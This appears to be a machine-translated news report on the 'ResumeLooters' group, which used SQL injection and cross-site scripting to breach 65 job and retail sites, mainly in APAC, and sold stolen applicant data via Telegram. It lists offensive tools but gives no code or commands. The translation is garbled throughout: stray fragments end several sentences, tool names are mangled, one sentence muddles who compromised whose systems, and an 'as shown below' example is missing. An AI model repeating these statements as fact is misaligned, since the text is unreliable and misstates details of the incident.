A threat group named ‘ResumeLooters’ used SQL injection and cross-site scripting (XSS) attacks to compromise 65 legitimate job and retail sites and steal the personal data of over 2 million job seekers. Ta.
The attackers are primarily focused on the APAC region, targeting sites in Australia, Taiwan, China, Thailand, India, and Vietnam to collect job applicants’ names, email addresses, phone numbers, employment history, education, and other information. Steal relevant information.
According to Group-IB, which has been tracking the threat group since its inception, in November 2023, ResumeLooters attempted to sell the stolen data through Telegram channels.
Infringe on legitimate sites
ResumeLooters primarily uses SQL injection and XSS to infiltrate target sites, primarily job search sites and retail stores.
The penetration testing phase included the use of open source tools such as:
- SQL map – Automate the detection and exploitation of SQL injection flaws and take over database servers.
- Acunetics – A web vulnerability scanner that identifies common vulnerabilities such as XSS and SQL injection and provides remediation reports.
- beef framework – Exploits web browser vulnerabilities and assesses the target’s security posture via client-side vectors.
- x-ray – Detect vulnerabilities in web applications and reveal their structure and potential weaknesses.
- metasploit – Develops and executes exploit code against targets and is also used for security assessments.
- ARL (Asset Reconnaissance Lighthouse) – Scan and map online assets to identify potential vulnerabilities in your network infrastructure.
- Search – A command line tool to perform brute force attacks on directories and files within web applications to reveal hidden resources.
After identifying and exploiting security weaknesses in the target site, ResumeLooters injects malicious script at numerous locations within the website’s HTML.
Some of these injections are injected to trigger scripts, while other places, such as form elements and anchor tags, simply display the injected script, as shown below.
However, if properly inserted, it will execute a malicious remote script that displays a phishing form to steal visitor information.
Group-IB also observed cases where attackers used custom attack techniques, such as creating fake employer profiles or posting fake resumes to include XSS scripts.
Thanks to an opsec mistake by the attackers, Group-IB was able to compromise the database hosting the stolen data, and the attackers were able to establish administrative access on some of the compromised sites. It became clear.
ResumeLooters carries out these attacks for financial gain and has linked up to at least two Telegram accounts using Chinese names: Penetration Data Center and World Data Ali. ) to try to sell the stolen data to other cybercriminals. .
Although Group-IB has not specifically confirmed the origin of the attackers, ResumeLooters is a Chinese-speaking group that sells stolen data and uses Chinese versions of tools such as X-Ray. Therefore, it is highly likely that they came from China.